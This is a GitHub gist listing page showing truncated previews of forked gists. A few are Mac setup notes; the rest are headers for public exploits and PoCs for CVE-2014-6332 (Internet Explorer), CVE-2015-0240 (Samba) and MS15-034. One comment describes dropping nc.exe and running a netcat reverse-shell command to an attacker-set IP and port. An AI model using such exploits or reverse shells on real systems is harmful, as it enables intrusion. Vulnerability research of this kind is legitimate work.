charlyborwn

@charlyborwn
charlyborwn / remove_postgres_on_mac_os.md
Created May 23, 2019 — forked from Atlas7/remove_postgres_on_mac_os.md
Note - How to completely uninstall PostgreSQL 9.X on Mac OSX
View remove_postgres_on_mac_os.md

This blog post has helped me clean up my postgres development environment on Mac. So making a copy!

How to completely uninstall PostgreSQL 9.X on Mac OSX

This article is referenced from stackoverflow:

If you installed PostgreSQL with Homebrew, enter brew uninstall postgresql

If you used the EnterpriseDB installer, follow the following step.
@charlyborwn
charlyborwn / iterm2-solarized.md
Created Mar 21, 2019 — forked from kevin-smets/iterm2-solarized.md
iTerm2 + Oh My Zsh + Solarized color scheme + Meslo powerline font + [Powerlevel9k] - (macOS)
View iterm2-solarized.md

Default

Powerlevel9k

@charlyborwn
charlyborwn / osx_setup.sh
Created Nov 14, 2018 — forked from avayanis/osx_setup.sh
Bootstrap a new Mac
View osx_setup.sh
#!/bin/bash
# Define script directories
TMP="/tmp/osx_setup"
# Package Versions
NODEVERSION="0.12.5"
# Introduction to setup
echo "Preparing to setup:"
View gist:8205342f848c0f76d1f7f321cce4ab6a
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
View SafeArrayRedim.cpp
/*
* reversed SafeArrayRedim() in oleaut32.dll (Windows XP)
* for CVE-2014-6332
*/
typedef struct tagSAFEARRAY
{
USHORT cDims; // number of dimensions
USHORT fFeatures; // type of elements
ULONG cbElements; // byte size per element
@charlyborwn
charlyborwn / cve-2014-6332_win7_ie11_poc.html
Last active May 23, 2017 — forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
View cve-2014-6332_win7_ie11_poc.html
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
@charlyborwn
charlyborwn / cve-2014-6332_exploit.html
Created May 23, 2017 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
View cve-2014-6332_exploit.html
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
@charlyborwn
charlyborwn / cve-2015-0240_samba_poc
Created May 23, 2017 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerability (CVE-2015-0240)
View cve-2015-0240_samba_poc
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@charlyborwn
charlyborwn / cve-2015-0240_samba_exploit.py
Created May 23, 2017 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerability (CVE-2015-0240)
View cve-2015-0240_samba_exploit.py
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@charlyborwn
charlyborwn / http_sys_pseudo.c
Created May 23, 2017 — forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
View http_sys_pseudo.c
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code is reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone who wants to know which functions are patched:
just open the patched version and find all functions that reference RtlULongLongAdd().
*/